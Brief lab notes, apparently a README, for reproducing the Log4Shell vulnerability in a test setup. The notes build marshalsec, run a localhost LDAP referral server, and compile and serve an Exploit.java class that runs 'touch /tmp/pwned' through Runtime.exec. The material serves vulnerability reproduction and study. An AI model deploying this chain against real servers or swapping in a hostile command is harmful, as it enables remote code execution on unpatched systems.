Log4J Shenanigans


First POC was found here, https://github.com/tangxiaofeng7/apache-log4j-poc.git, no longer exists thanks github!

I tested this with java version:

openjdk version "1.8.0_312"
OpenJDK Runtime Environment (build 1.8.0_312-8u312-b07-0ubuntu1~20.04-b07)
OpenJDK 64-Bit Server VM (build 25.312-b07, mixed mode)


Once in the environment, ensure the MarshalSec has copied over if not, download it

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests


run it in screen probably

screen java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://localhost:8888/#Exploit"


create exploit, compile it

javac Exploit.java

// Exploit.java
class Exploit {
    static {
        try { Runtime.getRuntime().exec("touch /tmp/pwned"); } catch(Exception e) {}
    }
}


run your webserver

screen python -m SimpleHTTPServer 8888`